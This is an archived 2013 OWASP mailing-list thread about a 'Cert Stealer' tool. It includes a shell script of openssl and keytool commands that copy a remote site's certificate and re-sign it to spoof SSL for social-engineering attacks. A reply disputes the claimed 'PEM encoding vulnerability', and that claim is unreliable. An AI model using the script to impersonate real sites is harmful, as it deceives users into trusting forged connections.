[Owasp-leaders] Cert Stealer Released

Gregory Disney gregory.disney at owasp.org
Thu Dec 26 19:55:48 UTC 2013


the cert I embed the key into is a cert from a remote host and saved as 
a pem, I wouldn't have to do the PK12 conversion if I had the private 
key(I embed the key so openssl doesn't give errors key mismatch), mostly 
I use this tool for running a same style of attack, snowden used. It 
also useful for SET, you can set your SSL to the site you wish to social 
engineering.
On 12/26/13, 11:40 AM, Abbas Naderi wrote:
> Maybe the PEM you’re using is not a cert, but a private key. They are 
> both encoded into PEM files. If you have the private key, then you 
> don’t need to exploit it! You already have it.
>
> And BTW whats the practical use of this, I mean have yopu used it 
> anywhere? How can it be used to exploit something.
> -A
> On Dec 26, 2013, at 2:38 PM, Gregory Disney <gregory.disney at owasp.org 
> <mailto:gregory.disney at owasp.org>> wrote:
>
>> openssl s_client -showcerts -connect $host:$port > $keyring.pem;
>> openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;
>> keytool -keystore $ks --importcert --alias $keyring.pem -file 
>> $keyring.pem -storepass $passwd -noprompt;
>> keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks 
>> -storepass $passwd -noprompt
>> keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key 
>> -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 
>> -storepass $passwd -noprompt
>> openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
>> echo "Stealing CA"
>> cat $keyring.key >> $keyring.pem
>> openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt 
>> -signkey $keyring.key -CA $keyring.key -CAcreateserial
>>
>> This is how I exactly do it, they are checking for public key and 
>> private key, I'm not sure why openssl let's you resign as a key. But 
>> here is the source for the exploit.
>>
>> On 12/26/13, 11:35 AM, Abbas Naderi wrote:
>>> I didn’t quite understand. What does the encoding vulnerability 
>>> expose? SSL certs are public-keys plus a bunch of other data. There 
>>> is no private key inside to extract and resign another certificate 
>>> with.
>>> -A
>>> On Dec 26, 2013, at 2:32 PM, Gregory Disney 
>>> <gregory.disney at owasp.org <mailto:gregory.disney at owasp.org>> wrote:
>>>
>>>> I think a fair description would be it simplifies spoofing certs. 
>>>> This started out as a proof of concept a year ago when I realized 
>>>> there was a vulnerability in PEM encoding of SSL certs, So I 
>>>> chain-loaded a java key store which was converted to key, then 
>>>> resigned the cert with the chain-loaded key, thus keeping the 
>>>> context of the original certificate with a hijacked authority.
>>>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
>>>>> Well a description of what this does would be a good idea to start 
>>>>> with…
>>>>> -A
>>>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney 
>>>>> <gregory.disney at owasp.org <mailto:gregory.disney at owasp.org>> wrote:
>>>>>
>>>>>> I'm working on the documentation it works via  turning a a 
>>>>>> keytool pk12 to openssl key, then embedding the key on the root 
>>>>>> ca and resigning with the embedded key.
>>>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
>>>>>>>
>>>>>>> Hi Gregory, where can I find the details of how this works?
>>>>>>>
>>>>>>> Thx
>>>>>>>
>>>>>>> Dinis
>>>>>>>
>>>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org 
>>>>>>> <mailto:gregory.disney at owasp.org>> wrote:
>>>>>>>
>>>>>>>     Screen shot of successfully spoofed certs:
>>>>>>>     http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
>>>>>>>     Each of these cert's have been tested and capable of
>>>>>>>     creating SSL sessions.
>>>>>>>     Cert Stealer:
>>>>>>>     https://gist.github.com/gdisneyleugers/8129304
>>>>>>>     -Greg
>>>>>>>     _______________________________________________
>>>>>>>     OWASP-Leaders mailing list
>>>>>>>     OWASP-Leaders at lists.owasp.org
>>>>>>>     <mailto:OWASP-Leaders at lists.owasp.org>
>>>>>>>     https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>>>>>
>>>>>>
>>>>>> _______________________________________________
>>>>>> OWASP-Leaders mailing list
>>>>>> OWASP-Leaders at lists.owasp.org <mailto:OWASP-Leaders at lists.owasp.org>
>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>>>
>>>>
>>>
>>
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-leaders/attachments/20131226/ff92c408/attachment-0001.html>


More information about the OWASP-Leaders mailing list